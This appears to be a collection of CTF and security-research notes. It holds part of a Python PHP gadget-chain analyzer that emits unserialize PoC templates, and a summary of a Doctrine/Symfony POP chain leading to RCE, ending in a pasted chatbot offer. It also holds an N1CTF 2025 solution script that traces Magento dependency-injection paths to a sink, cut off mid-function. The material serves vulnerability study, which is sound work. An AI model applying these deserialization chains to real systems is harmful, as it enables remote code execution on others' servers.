            severity_factor = severity_map.get(sink.severity, 0.5)
            
            # Injectable objects increase confidence
            inject_factor = 1.2 if injectable else 0.8
            
            # Check if path has high-confidence taint
            taint_factor = 1.0
            for step in path:
                method = step.get('method', '')
                if method in self.tainted_methods:
                    taint_factor = max(taint_factor, self.tainted_methods[method])
            
            confidence = min(0.99, base * length_factor * entry_factor * severity_factor * inject_factor * taint_factor)
            return round(confidence, 2)
        
        def _generate_description(self, path: List[Dict], sink: TaintSink) -> str:
            """Generate chain description"""
            entry = path[0].get('method', 'Unknown')
            def format_step(step: Dict[str, Any]) -> str:
                method = step.get('method', '?')
                method_file = step.get('method_file') or 'Unknown file'
                method_line = step.get('method_line', 0)
                if method_line:
                    return f"{method} ({method_file}:{method_line})"
                return f"{method} ({method_file})"
            
            chain_str = " → ".join([format_step(p) for p in path])
            
            return (f"Gadget chain from {entry} to {sink.function}(). "
                    f"Path: {chain_str}")
        
        def _generate_exploit_notes(self, path: List[Dict], sink: TaintSink,
                                   injectable: List[Dict]) -> str:
            """Generate detailed exploitation guidance"""
            notes = []
            
            entry = path[0].get('method', 'Unknown')
            notes.append(f"**Entry Point:** {entry}")
            sink_path = sink.filepath or 'Unknown file'
            notes.append(f"**Sink:** {sink.function}() [{sink.severity.name}] at {sink_path}:{sink.line}")
            notes.append(f"**Chain Length:** {len(path)} steps\n")
            
            if injectable:
                notes.append("**Injectable Classes:**")
                for obj in injectable:
                    cls = obj['class']
                    props = obj['properties']
                    notes.append(f"  • {cls}")
                    if props:
                        notes.append(f"    Properties: {', '.join(props[:5])}")
                        if len(props) > 5:
                            notes.append(f"    ... and {len(props) - 5} more")
                notes.append("")
            
            # Add PoC template
            if injectable and any('__wakeup' in entry or '__destruct' in entry for entry in [path[0].get('method', '')]):
                notes.append("**Proof of Concept:**")
                notes.append("```php")
                target_class = injectable[0]['class']
                target_props = injectable[0]['properties']
                notes.append(f"$exploit = new {target_class}();")
                for prop in target_props[:3]:
                    notes.append(f"$exploit->{prop} = 'PAYLOAD';  // Control this")
                notes.append("$serialized = serialize($exploit);")
                notes.append("// Trigger: unserialize($serialized);")
                notes.append("```\n")
            
            # Add chain visualization
            notes.append("**Execution Flow:**")
            for i, step in enumerate(path, 1):
                method = step.get('method', 'Unknown')
                call_type = step.get('call_type', 'entry')
                method_file = step.get('method_file') or 'Unknown file'
                method_line = step.get('method_line', 0)
                call_file = step.get('call_file') or 'Unknown file'
                call_line = step.get('call_line', 0)
                
                base = f"  {i}. {method} [{call_type}]"
                location = f"{method_file}:{method_line}" if method_line else method_file
                base += f" — defined at {location}"
                
                if call_type != 'entry':
                    if call_line:
                        call_location = f"{call_file}:{call_line}"
                    else:
                        call_location = call_file
                    base += f" (invoked from {call_location})"
                
                notes.append(base)
            
            return "\n".join(notes)
    
    
    class Reporter:
        """Enhanced reporter"""
        
        def __init__(self):
            self.chains: List[GadgetChain] = []
        
        def add_chains(self, chains: List[GadgetChain]):
            self.chains.extend(chains)
        
        def generate_text_report(self) -> str:
            """Generate detailed text report"""
            if not self.chains:
                return "\n✓ No gadget chains detected.\n"
            
            lines = []
            lines.append("\n" + "=" * 100)
            lines.append(" PHP GADGET CHAIN ANALYSIS - DETAILED REPORT")
            lines.append("=" * 100)
            lines.append(f"\nTotal Chains: {len(self.chains)}")
            
            # Statistics
            by_severity = defaultdict(int)
            for chain in self.chains:
                by_severity[chain.severity.name] += 1
            
            lines.append("\nSeverity Breakdown:")
            for severity in ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']:
                count = by_severity.get(severity, 0)
                if count > 0:
                    lines.append(f"  🔴 {severity}: {count}")
            
            lines.append("\n" + "=" * 100)
            
            # Sort by severity and confidence
            sorted_chains = sorted(
                self.chains,
                key=lambda c: (c.severity.value, c.confidence),
                reverse=True
            )
            
            for chain in sorted_chains:
                lines.append(f"\n{'='*100}")
                lines.append(f"🔴 CHAIN #{chain.chain_id} - {chain.severity.name} SEVERITY (Confidence: {chain.confidence:.0%})")
                lines.append("="*100)
                
                sink_path = chain.sink.filepath or 'Unknown file'
                lines.append(f"\nSink Location: {sink_path}:{chain.sink.line}")
                lines.append("\nExecution Flow:")
                for step in chain.chain_path:
                    method = step.get('method', 'Unknown')
                    call_type = step.get('call_type', 'entry')
                    method_file = step.get('method_file') or 'Unknown file'
                    method_line = step.get('method_line', 0)
                    call_file = step.get('call_file') or 'Unknown file'
                    call_line = step.get('call_line', 0)
    
                    location = f"{method_file}:{method_line}" if method_line else method_file
                    entry = f"  • {method} [{call_type}] — defined at {location}"
    
                    if call_type != 'entry':
                        call_location = f"{call_file}:{call_line}" if call_line else call_file
                        entry += f" (invoked from {call_location})"
    
                    lines.append(entry)
                lines.append(f"\n{chain.description}\n")
                lines.append(chain.exploitation_notes)
                lines.append("")
            
            lines.append("="*100)
            return "\n".join(lines)
        
        def generate_json_report(self) -> str:
            """Generate JSON report"""
            data = {
                'total_chains': len(self.chains),
                'severity_breakdown': {},
                'chains': []
            }
            
            # Calculate severity breakdown
            by_severity = defaultdict(int)
            for chain in self.chains:
                by_severity[chain.severity.name] += 1
            data['severity_breakdown'] = dict(by_severity)
            
            # Add chain details
            for chain in self.chains:
                data['chains'].append({
                    'id': chain.chain_id,
                    'severity': chain.severity.name,
                    'confidence': chain.confidence,
                    'entry_points': chain.entry_points,
                    'sink': {
                        'function': chain.sink.function,
                        'location': chain.sink.location,
                        'filepath': chain.sink.filepath,
                        'severity': chain.sink.severity.name,
                        'line': chain.sink.line
                    },
                    'path': [
                        {
                            'method': step.get('method', ''),
                            'class': step.get('class', ''),
                            'type': step.get('type', ''),
                            'call_type': step.get('call_type', ''),
                            'method_file': step.get('method_file', ''),
                            'method_line': step.get('method_line', 0),
                            'call_file': step.get('call_file', ''),
                            'call_line': step.get('call_line', 0),
                            'line': step.get('line', 0)
                        }
                        for step in chain.chain_path
                    ],
                    'injectable_objects': chain.injectable_objects,
                    'description': chain.description
                })
            
            return json.dumps(data, indent=2)
    
    
    class GadgetChainAnalyzer:
        """Main analyzer orchestrator"""
        
        def __init__(self):
            try:
                self.parser = PHPASTParser()
            except RuntimeError as exc:
                print(f"\n❌ Error: {exc}")
                print("\nInstallation instructions:")
                print("  1. Ensure PHP ast extension is installed (e.g., sudo apt-get install php-ast)")
                print("  2. Or install python wrapper: pip install php-ast")
                sys.exit(1)
            
            self.reporter = Reporter()
        
        def analyze_directory(self, directory: str, recursive: bool = True, stream_output: bool = True) -> List[GadgetChain]:
            """Analyze all PHP files in directory"""
            print(f"\n📁 Scanning directory: {directory}")
            print(f"   Recursive mode: {'✓ enabled' if recursive else '✗ disabled'}")
            
            php_files = self._find_php_files(directory, recursive)
            
            if not php_files:
                print("\n❌ No PHP files found!")
                return []
            
            print(f"\n📄 Found {len(php_files)} PHP file(s)\n")
            
            # Parse all files
            parsed_files = []
            failed = 0
            
            for i, php_file in enumerate(php_files, 1):
                try:
                    print(f"  [{i}/{len(php_files)}] Parsing: {php_file}")
                    parsed = self.parser.parse_file(php_file)
                    
                    if parsed['success']:
                        parsed_files.append(parsed)
                        print(f"              ✓ Success")
                    else:
                        print(f"              ✗ Failed: {parsed.get('error', 'Unknown error')}")
                        failed += 1
                except Exception as e:
                    print(f"              ✗ Exception: {e}")
                    failed += 1
            
            print(f"\n📊 Parsing complete: {len(parsed_files)} success, {failed} failed\n")
            
            if not parsed_files:
                print("❌ No files successfully parsed")
                return []
            
            # Walk AST
            print("🔍 Analyzing AST...")
            walker = ASTWalker()
            
            for parsed_data in parsed_files:
                walker.walk(parsed_data)
            
            print(f"   ✓ Found {len(walker.classes)} classes")
            print(f"   ✓ Found {len(walker.methods)} methods")
            print(f"   ✓ Found {len(walker.calls)} call sites")
            print(f"   ✓ Found {len(walker.property_accesses)} property accesses\n")
            
            # Perform taint analysis
            print("🔬 Performing taint analysis...")
            analyzer = AdvancedTaintAnalyzer(walker)
            chains = analyzer.analyze(stream_output=stream_output)
            
            return chains
        
        def analyze_file(self, filepath: str, stream_output: bool = True) -> List[GadgetChain]:
            """Analyze single PHP file"""
            print(f"\n📄 Analyzing file: {filepath}\n")
            
            parsed = self.parser.parse_file(filepath)
            
            if not parsed['success']:
                print(f"❌ Failed to parse: {parsed.get('error')}")
                return []
            
            walker = ASTWalker()
            walker.walk(parsed)
            
            print(f"   ✓ Found {len(walker.classes)} classes")
            print(f"   ✓ Found {len(walker.methods)} methods\n")
            
            print("🔬 Performing taint analysis...")
            analyzer = AdvancedTaintAnalyzer(walker)
            chains = analyzer.analyze(stream_output=stream_output)
            
            return chains
        
        def _find_php_files(self, directory: str, recursive: bool) -> List[str]:
            """Find all PHP files"""
            php_files = []
            path = Path(directory)
            
            if not path.exists():
                print(f"❌ Error: Directory '{directory}' does not exist")
                return []
            
            if not path.is_dir():
                print(f"❌ Error: '{directory}' is not a directory")
                return []
            
            if recursive:
                for root, dirs, files in os.walk(directory):
                    for file in files:
                        if file.endswith('.php'):
                            php_files.append(os.path.join(root, file))
            else:
                php_files = [str(f) for f in path.glob('*.php') if f.is_file()]
            
            return sorted(php_files)
    
    
    def main():
        parser = argparse.ArgumentParser(
            description='Advanced PHP Gadget Chain Taint Analyzer',
            formatter_class=argparse.RawDescriptionHelpFormatter,
            epilog="""
    Examples:
      %(prog)s -d /path/to/php/project -r
      %(prog)s -f vulnerable.php -o json
      %(prog)s -d /var/www --min-confidence 0.7 --min-severity HIGH
    
    Requirements:
      pip install php-ast
    
    Note: php-ast requires PHP with the ast extension enabled.
          See: https://github.com/nikic/php-ast
            """
        )
        
        parser.add_argument('-d', '--directory', help='Directory to analyze')
        parser.add_argument('-f', '--file', help='Single file to analyze')
        parser.add_argument('-r', '--recursive', action='store_true',
                           help='Recursively scan directory')
        parser.add_argument('-o', '--output', choices=['text', 'json'],
                           default='text', help='Output format (default: text)')
        parser.add_argument('--min-confidence', type=float, default=0.0,
                           help='Minimum confidence threshold (0.0-1.0)')
        parser.add_argument('--min-severity', 
                           choices=['LOW', 'MEDIUM', 'HIGH', 'CRITICAL'],
                           help='Minimum severity level')
        parser.add_argument('--show-all', action='store_true',
                           help='Show all chains including low confidence')
        parser.add_argument('--no-stream', action='store_true',
                           help='Disable streaming output (show all results at end)')
        parser.add_argument('--summary-only', action='store_true',
                           help='Show only summary, not full details')
        
        args = parser.parse_args()
        
        if not args.directory and not args.file:
            parser.error('Either --directory or --file must be specified')
        
        # Check if php-ast is available
        if not PHP_AST_AVAILABLE:
            print("\n❌ Error: php-ast module is not installed")
            print("\nInstallation instructions:")
            print("  1. Install PHP ast extension:")
            print("     - Ubuntu/Debian: sudo apt-get install php-ast")
            print("     - Or compile from source: https://github.com/nikic/php-ast")
            print("  2. Install Python package:")
            print("     pip install php-ast")
            sys.exit(1)
        
        analyzer = GadgetChainAnalyzer()
        
        # Perform analysis
        try:
            stream_output = not args.no_stream
            
            if args.directory:
                chains = analyzer.analyze_directory(args.directory, args.recursive, stream_output)
            else:
                chains = analyzer.analyze_file(args.file, stream_output)
        except KeyboardInterrupt:
            print("\n\n⚠️  Analysis interrupted by user")
            sys.exit(1)
        except Exception as e:
            print(f"\n❌ Error during analysis: {e}")
            import traceback
            traceback.print_exc()
            sys.exit(1)
        
        # Filter chains
        filtered_chains = chains
        
        if not args.show_all:
            # Default minimum confidence
            min_conf = args.min_confidence
            filtered_chains = [c for c in filtered_chains if c.confidence >= min_conf]
        elif args.min_confidence > 0:
            filtered_chains = [c for c in filtered_chains if c.confidence >= args.min_confidence]
        
        if args.min_severity:
            min_level = TaintLevel[args.min_severity]
            filtered_chains = [c for c in filtered_chains if c.severity.value >= min_level.value]
        
        # Generate report
        analyzer.reporter.add_chains(filtered_chains)
        
        if args.output == 'json':
            print(analyzer.reporter.generate_json_report())
        elif args.summary_only:
            # Just print summary
            print("\n" + "="*100)
            print(f"📊 FINAL SUMMARY: {len(filtered_chains)} chains detected")
            print("="*100)
            
            by_severity = defaultdict(int)
            for chain in filtered_chains:
                by_severity[chain.severity.name] += 1
            
            print("\nSeverity Breakdown:")
            for severity in ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']:
                count = by_severity.get(severity, 0)
                if count > 0:
                    emoji = {'CRITICAL': '🔴', 'HIGH': '🟠', 'MEDIUM': '🟡', 'LOW': '🟢'}.get(severity, '⚪')
                    print(f"  {emoji} {severity}: {count}")
        else:
            # Only print full report if not streaming (to avoid duplication)
            if args.no_stream:
                print(analyzer.reporter.generate_text_report())
            else:
                # Just print summary since we already showed details
                print("\n" + "="*100)
                print("📊 SUMMARY OF ALL DETECTED CHAINS")
                print("="*100)
                
                # Group by severity
                sorted_chains = sorted(filtered_chains, key=lambda c: (c.severity.value, c.confidence), reverse=True)
                current_severity = None
                
                for chain in sorted_chains:
                    if chain.severity.name != current_severity:
                        current_severity = chain.severity.name
                        emoji = {'CRITICAL': '🔴', 'HIGH': '🟠', 'MEDIUM': '🟡', 'LOW': '🟢'}.get(current_severity, '⚪')
                        print(f"\n{emoji} {current_severity} SEVERITY CHAINS")
                        print("-" * 100)
                    
                    # Sink info
                    sink_file = chain.sink.filepath or 'Unknown'
                    
                    print(f"Chain #{chain.chain_id:<3} | Conf: {chain.confidence:.0%} | Sink: {chain.sink.function}()")
                    print(f"  Location: {sink_file}:{chain.sink.line}")
                    
                    # Entry info
                    if chain.chain_path:
                        entry_step = chain.chain_path[0]
                        entry_method = entry_step.get('method', '?')
                        entry_file = entry_step.get('method_file', 'Unknown')
                        print(f"  Entry:    {entry_method} in {entry_file}:{entry_step.get('method_line', 0)}")
                    
                    # Injectable info
                    if chain.injectable_objects:
                        objs = [o['class'] for o in chain.injectable_objects]
                        objs_str = ", ".join(objs[:2])
                        if len(objs) > 2:
                            objs_str += f" (+{len(objs)-2} more)"
                        print(f"  Trigger:  new {objs_str}")
                    
                    # Flow
                    print(f"  Flow:")
                    for i, step in enumerate(chain.chain_path, 1):
                         method = step.get('method', '?')
                         file_path = step.get('method_file', 'Unknown')
                         line_num = step.get('method_line', 0)
                         print(f"    {i}. {method} in {file_path}:{line_num}")
                    print("")
                
                print(f"💡 Use --no-stream for full details of all chains")
        
        # Exit codes
        if filtered_chains:
            critical_chains = [c for c in filtered_chains if c.severity == TaintLevel.CRITICAL]
            high_chains = [c for c in filtered_chains if c.severity == TaintLevel.HIGH]
            
            if critical_chains:
                print(f"\n⚠️  {len(critical_chains)} CRITICAL severity chain(s) found!")
                sys.exit(2)
            elif high_chains:
                print(f"\n⚠️  {len(high_chains)} HIGH severity chain(s) found!")
                sys.exit(1)
            else:
                sys.exit(1)
        else:
            print("\n✅ No significant vulnerabilities detected")
            sys.exit(0)
    
    
    if __name__ == '__main__':
        main()
    Itended

    they don’t yet upload the solver, but the author send this to the server as reference

    https://www.synacktiv.com/publications/finding-a-pop-chain-on-a-common-symfony-bundle-part-1

    the solver added Drupal RCE gadget chain · anzuukino/phpggc@d0ac1bc

    TL;DR

  • A POP chain was found starting from Doctrine\Common\Cache\Psr6\CacheAdapter::__destruct(), which calls commit().
  • Because PHP lets an attacker control object-typed properties during deserialization, calls inside commit() (e.g., get(), save(), delete()) can be redirected to attacker-controlled classes.
  • The delete() path can flow into PhpArrayAdapter::initialize() which uses a vulnerable include, allowing full RCE if the attacker can already write a file to disk (first prerequisite).

  • Article Summary

    The goal was to identify a valid POP chain inside the doctrine/doctrine-bundle dependency stack (downloaded 144M+ times). The research relies primarily on static analysis to identify a deserialization entrypoint and the sequence of method calls that lead to a vulnerable include.


    Methodology Highlights

  • Finding the entrypoint

      Search for PHP magic methods invoked automatically during deserialization, primarily __wakeup, __unserialize, and __destruct.

  • Initial target selection

      The deprecated but still-included class Doctrine\Common\Cache\Psr6\CacheAdapter was chosen because its __destruct() directly calls commit(). Many other Symfony classes defend against POP chains by throwing BadMethodCallException inside __wakeup()CacheAdapter did not.

  • Chain construction

      Inside commit(), code invokes methods such as getExpiry(), get(), save(), and delete() on properties like $this->cache and members of $this->deferredItems. Due to PHP’s weak typing, an attacker controlling the object graph produced from deserialization can make those properties reference attacker-controlled objects/classes.

  • Achieving code execution

      The chain uses delete() to reach PhpArrayAdapter via CacheTrait::delete()deleteItem()PhpArrayAdapter::initialize(). The latter has an include of a file path that can be influenced if the attacker is able to write a file to disk — completing the RCE chain.


  • Impact

  • Preconditions: PHP unserialization must be possible in the target environment, and the attacker must already be able to write a file to disk (local file write).
  • Consequence: If both preconditions are met, the POP chain enables Remote Code Execution (RCE) via the include in PhpArrayAdapter::initialize().

  • Example Code and Analysis Snippets

    Below are the key snippets and commands used during static analysis and chain construction.

    1. Locating __destruct without __wakeup protection

    Search the dependency tree for classes implementing __destruct, then filter out those whose __wakeup() defends by throwing BadMethodCallException:

    # Search for classes implementing __destruct without a __wakeup protection
    $ grep -rl '__destruct' | xargs grep -L BadMethodCallException
    doctrine/cache/lib/Doctrine/Common/Cache/Psr6/CacheAdapter.php
    # ... other results
    

    2. The CacheAdapter entrypoint

    CacheAdapter::__destruct() immediately calls commit() — a controllable jump-start for the POP chain:

    <?php namespace Doctrine\Common\Cache\Psr6;
    
    final class CacheAdapter implements CacheItemPoolInterface {
        // [...]
        public function __destruct() {
            // This call is the start of the POP chain
            $this->commit();
        }
    }
    

    3. commit() — how attacker-controlled properties are used

    Fields that an attacker can influence during deserialization:

    <?php namespace Doctrine\Common\Cache\Psr6;
    
    final class CacheAdapter implements CacheItemPoolInterface {
        /** @var Cache */                       // Controlled by the attacker
        private $cache;
    
        /** @var array<CacheItem|TypedCacheItem> */
        private $deferredItems = [];           // Controlled by the attacker
    
        // [...]
    
        public function commit(): bool {
            // ... loop through $this->deferredItems
    
            // Example interactions on controlled objects:
            // [2] $byLifetime[(int) $lifetime][$key] = $item->get();
    
            // [4] Final call that leads to RCE chain:
            switch (count($expiredKeys)) {
                case 0:
                    break;
                case 1:
                    $this->cache->delete(current($expiredKeys)); // <--- chosen jump point
                    break;
                default:
                    $this->doDeleteMultiple($expiredKeys);
                    break;
            }
    
            // [3] return $this->cache->save($key, $item->get(), (int) $lifetime);
            // ...
        }
    }
    

    4. The final link: delete() → trait → PhpArrayAdapter::initialize()

    CacheTrait::delete() funnels into deleteItem(). When the implementation is PhpArrayAdapter, deleteItem() leads to PhpArrayAdapter::initialize() which contains an include on a filesystem path — the step that makes RCE possible if the attacker can place a file there.

    # Showing the delete wrapper from the CacheTrait
    $ cat ./symfony/cache-contracts/CacheTrait.php | grep 'function delete(' -A 3
    public function delete(string $key): bool {
        return $this->deleteItem($key);
    }
    

    (From there, tracing the concrete implementation of deleteItem() to PhpArrayAdapter::initialize() reveals the vulnerable include.)


    Mitigations & Recommendations

  • Avoid PHP unserialize() on untrusted input. Use safe serialization formats (JSON, msgpack with safe decoding) or data signing to ensure integrity.
  • Patch or upgrade the vulnerable dependency to a version where the POP chain is closed or classes are hardened against this pattern. (Check vendor advisories and changelogs.)
  • Harden file-write permissions and prevent attackers from writing arbitrary files to disk (principle of least privilege). Even if a POP chain exists, denying file-write capability blocks the final RCE step.
  • Use runtime defenses such as disabling dangerous include paths, using open_basedir, or applying code-hardening tools that detect suspicious deserialization patterns.
  • Static and dynamic analysis: Combine static code analysis with runtime fuzzing of deserialization entrypoints to detect POP chains earlier in the supply chain.

  • Closing notes

  • The described POP chain relies on a combination of (A) available PHP deserialization of attacker-controlled data, (B) the ability to control object property types/values during that process, and (C) file-write capability on the host. All three together produce the RCE.
  • Static analysis (grep + code tracing) was sufficient to locate the chain and map the call sequence, but responsible disclosure and vendor coordination are necessary steps before any public release of exploit PoCs.

  • If you want, I can:

  • produce a one-page PDF / slide summarizing this (ready for disclosure), or
  • rewrite the article into a short technical disclosure template for vendor reporting, or
  • expand the mitigations section into a prioritized action plan.
  • Which of those would you like next?

    CVE Magento\Framework\Url and make taint analysis yourself

    Event NameN1CTF 2025
    GitHub URL-
    Challenge NameThis challenge has been ruined
    Attachments
    References

    solution

    This challenge has been ruined:

    source点为可匿名访问的API,sink点为Magento\Framework\Url, API访问时解析JSON数据进行依赖注入,构建所有实现的依赖关系,使用构造器方法进行污点传播,写个脚本找出source到sink点的所有路径即可

    from __future__ import annotations
    	
    import os
    import re
    import sys
    import xml.etree.ElementTree as ET
    from collections import deque
    from dataclasses import dataclass
    from typing import Dict, List, Optional, Set, Tuple
    
    SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
    MAGENTO_ROOT = os.path.join(SCRIPT_DIR, "magento2-2.4.9-alpha3")
    DI_LIST_PATH = os.path.join(SCRIPT_DIR, "dis.txt")
    WEBAPIS_LIST_PATH = os.path.join(SCRIPT_DIR, "webapis.txt")
    TARGET_CLASS = "Magento\\Framework\\Url"
    
    CLASS_ROOTS = [
        os.path.join(MAGENTO_ROOT, "app", "code"),
        os.path.join(MAGENTO_ROOT, "lib", "internal"),
        os.path.join(MAGENTO_ROOT, "vendor"),
        os.path.join(MAGENTO_ROOT, "setup"),
        os.path.join(MAGENTO_ROOT, "generated"),
        os.path.join(MAGENTO_ROOT, "dev"),
    ]
    
    PRIMITIVE_TYPES = {
        "array",
        "bool",
        "boolean",
        "callable",
        "double",
        "float",
        "int",
        "integer",
        "iterable",
        "mixed",
        "object",
        "resource",
        "string",
        "void",
        "false",
        "true",
        "never",
    }
    
    
    @dataclass
    class ClassInfo:
    
        path: str
        namespace: str
        use_map: Dict[str, str]
        parent: Optional[str]
        constructor_deps: List[str]
        source: str
    
    
    @dataclass(frozen=True)
    class Endpoint:
    
        url: str
        http_method: str
        service_class: str
        service_method: str
    
    
    def load_di_mapping() -> Dict[str, str]:
        mapping: Dict[str, str] = {}
        if not os.path.exists(DI_LIST_PATH):
            return mapping
    
        with open(DI_LIST_PATH, "r", encoding="utf-8") as handle:
            for raw_line in handle:
                line = raw_line.strip()
                if not line or line.startswith("#"):
                    continue
                abs_path = os.path.normpath(os.path.join(SCRIPT_DIR, line))
                if not os.path.isfile(abs_path):
                    continue
                try:
                    tree = ET.parse(abs_path)
                except ET.ParseError:
                    # Skip malformed fixtures (common under dev/tests).
                    continue
                root = tree.getroot()
                for pref in root.findall(".//preference"):
                    target = pref.attrib.get("type")
                    source = pref.attrib.get("for")
                    if target and source:
                        # Last writer wins, mirroring Magento DI behaviour.
                        mapping[source.lstrip("\\")] = target.lstrip("\\")
        return mapping
    
    
    def class_to_path(class_name: str) -> Optional[str]:
        rel_path = class_name.replace("\\", os.sep) + ".php"
    
        for root in CLASS_ROOTS:
            candidate = os.path.join(root, rel_path)
            if os.path.isfile(candidate):
                return candidate
    
        return None
    
    
    def parse_use_statements(content: str) -> Dict[str, str]:
        """Extract `use` aliases from a PHP file."""
        use_map: Dict[str, str] = {}
        pattern = re.compile(r"^\s*use\s+([^;]+);", re.MULTILINE)
    
        for match in pattern.finditer(content):
            statement = match.group(1).strip()
            if not statement or statement.startswith(("function ", "const ")):
                continue
    
            # Split multiple imports separated by commas at top-level.
            segments = []
            brace_depth = 0
            current = []
            for ch in statement:
                if ch == "," and brace_depth == 0:
                    segment = "".join(current).strip()
                    if segment:
                        segments.append(segment)
                    current = []
                    continue
                if ch == "{":
                    brace_depth += 1
                elif ch == "}":
                    brace_depth = max(0, brace_depth - 1)
                current.append(ch)
            tail = "".join(current).strip()
            if tail:
                segments.append(tail)
    
            for segment in segments:
                if "{" in segment:
                    prefix, remainder = segment.split("{", 1)
                    prefix = prefix.strip().rstrip("\\")
                    remainder = remainder.rstrip("}")
                    for part in remainder.split(","):
                        part = part.strip()
                        if not part:
                            continue
                        full, alias = _extract_use_part(part)
                        full_name = "\\".join(
                            x for x in [prefix, full] if x
                        ).strip("\\")
                        use_map[alias] = full_name
                else:
                    full, alias = _extract_use_part(segment)
                    use_map[alias] = full
    
        return use_map
    
    
    def _extract_use_part(part: str) -> Tuple[str, str]:
        pieces = part.split(" as ")
        if len(pieces) == 2:
            full_name = pieces[0].strip().lstrip("\\")
            alias = pieces[1].strip()
        else:
            full_name = part.strip().lstrip("\\")
            alias = full_name.split("\\")[-1]
        return full_name, alias
    
    
    def resolve_type(
        type_name: str, namespace: str, use_map: Dict[str, str]
    ) -> Optional[str]:
        if not type_name:
            return None
    
        type_name = type_name.strip()
    
        type_name = type_name.lstrip("&").lstrip("?")
    
        if not type_name or type_name.lower() in PRIMITIVE_TYPES:
            return None
    
        if "|" in type_name:
            for part in type_name.split("|"):
                part = part.strip()
                if part.lower() == "null":
                    continue
                resolved = resolve_type(part, namespace, use_map)
                if resolved:
                    return resolved
            return None
    
        if type_name == "self":
            return namespace
        if type_name == "static":
            return namespace
        if type_name == "parent":
            return None
    
        if type_name.startswith("\\"):
            return type_name.lstrip("\\")
    
        if "\\" in type_name:
            head, tail = type_name.split("\\", 1)
            mapped = use_map.get(head)
            if mapped:
                return "\\".join([mapped, tail]).strip("\\")
            return "\\".join([namespace, type_name]).strip("\\")
    
        mapped = use_map.get(type_name)
        if mapped:
            return mapped
    
        if namespace:
            return f"{namespace}\\{type_name}"
    
        return type_name
    
    
    CLASS_INFO_CACHE: Dict[str, Optional[ClassInfo]] = {}
    
    
    def get_class_info(class_name: str) -> Optional[ClassInfo]:
        if class_name in CLASS_INFO_CACHE:
            return CLASS_INFO_CACHE[class_name]
    
        path = class_to_path(class_name)
        if not path or not os.path.isfile(path):
            CLASS_INFO_CACHE[class_name] = None
            return None
    
        try:
            with open(path, "r", encoding="utf-8") as handle:
                content = handle.read()
        except UnicodeDecodeError:
            with open(path, "r", encoding="latin-1") as handle:
                content = handle.read()
    
        namespace = ""
        ns_match = re.search(r"namespace\s+([^;]+);", content)
        if ns_match:
            namespace = ns_match.group(1).strip()
    
        use_map = parse_use_statements(content)
    
        parent = None
        class_pattern = re.compile(
            r"(?:final\s+|abstract\s+)?class\s+(\w+)(?:\s+extends\s+([^\s\{]+))?",
            re.MULTILINE,
        )
        class_match = class_pattern.search(content)
        if class_match:
            parent_raw = class_match.group(2)
            if parent_raw:
                parent = resolve_type(parent_raw.strip(), namespace, use_map)
    
        deps: List[str] = []
        ctor_pattern = re.compile(r"function\s+__construct\s*\((.*?)\)", re.DOTALL)
        ctor_match = ctor_pattern.search(content)
    
        if ctor_match:
            params_str = ctor_match.group(1)
            params_clean = re.sub(r"#\[[^\]]*\]\s*", "", params_str)
    
            tokens: List[str] = []
            current = []
            depth = 0
            for ch in params_clean:
                if ch == "," and depth == 0:
                    token = "".join(current).strip()
                    if token:
                        tokens.append(token)
                    current = []
                    continue
                if ch in ("(", "["):
                    depth += 1
                elif ch in (")", "]"):
                    depth = max(0, depth - 1)
                current.append(ch)
            tail = "".join(current).strip()
            if tail:
                tokens.append(tail)
    
            for token in tokens:
                token = token.strip()
                if not token:
                    continue
                if "=" in token:
                    token = token.split("=", 1)[0].strip()
                token = re.sub(
                    r"^(public|protected|private|final|readonly|static)\s+", "", token
                )
                # Extract type hint (everything before the variable name).
                parts = token.split()
                type_hint = None
                for part in parts:
                    if part.startswith("&"):
                        continue
                    if part.startswith("..."):
                        continue
                    if part.startswith("$"):
                        break
                    type_hint = part
                if not type_hint:
                    continue
                resolved = resolve_type(type_hint, namespace, use_map)
                if resolved:
                    deps.append(resolved)
    
        info = ClassInfo(
            path=path,
            namespace=namespace,
            use_map=use_map,
            parent=parent,
            constructor_deps=deps,
            source=content,
        )
        CLASS_INFO_CACHE[class_name] = info
        return info
    
    
    def resolve_concretes(type_name: str, di_mapping: Dict[str, str]) -> List[str]:
        queue: deque[str] = deque([type_name.lstrip("\\")])
        visited: Set[str] = set()
        concretes: Set[str] = set()
    
        while queue:
            current = queue.popleft()
            if current in visited:
                continue
            visited.add(current)
    
            target = di_mapping.get(current)
            if target:
                normalized = target.lstrip("\\")
                if normalized not in visited:
                    queue.append(normalized)
                continue
    
            concretes.add(current)
    
        return sorted(concretes)
    
    
    def find_constructor_path(
        start_class: str, di_mapping: Dict[str, str], target: str = TARGET_CLASS
    ) -> Optional[List[str]]:
        normalized_start = start_class.lstrip("\\")
    
        queue: deque[str] = deque([normalized_start])
        parents: Dict[str, Optional[str]] = {normalized_start: None}
    
        while queue:
            current = queue.popleft()
            if current == target:
                path: List[str] = []
                node: Optional[str] = current
                while node is not None:
                    path.append(node)
                    node = parents[node]
                path.reverse()
                return path
    
            info = get_class_info(current)
            if not info:
                continue
    
            dependencies = list(info.constructor_deps)
            if info.parent:
                dependencies.append(info.parent)
    
            for dep in dependencies:
                dep_norm = dep.lstrip("\\")
                candidate_types: Set[str] = {dep_norm}
                if dep_norm.endswith("\\Proxy"):
                    candidate_types.add(dep_norm[:-6])
    
                for candidate in candidate_types:
                    for concrete in resolve_concretes(candidate, di_mapping):
                        if concrete not in parents:
                            parents[concrete] = current
                            queue.append(concrete)
    
        return None
    
    
    def _parse_method_parameters(
        info: ClassInfo, method_name: str
    ) -> Optional[List[Tuple[str, str]]]:
        pattern = re.compile(
            rf"function\s+{re.escape(method_name)}\s*\((.*?)\)",
            re.IGNORECASE | re.DOTALL,
        )
        match = pattern.search(info.source)
        if not match:
            return None
    
        params_str = match.group(1)
        params_clean = re.sub(r"#\[[^\]]*\]\s*", "", params_str)
    
        tokens: List[str] = []
        current: List[str] = []
        depth = 0
        for ch in params_clean:
            if ch == "," and depth == 0:
                token = "".join(current).strip()
                if token:
                    tokens.append(token)
                current = []
                continue
            if ch in ("(", "["):
                depth += 1
            elif ch in (")", "]"):
                depth = max(0, depth - 1)
            current.append(ch)
        tail = "".join(current).strip()
        if tail:
            tokens.append(tail)
    
        results: List[Tuple[str, str]] = []
        for token in tokens:
            token = token.strip()
            if not token:
                continue
    
            # Strip default assignments.
            if "=" in token:
                token = token.split("=", 1)[0].strip()
    
            token = re.sub(
                r"^(public|protected|private|final|readonly|static)\s+", "", token
            )
    
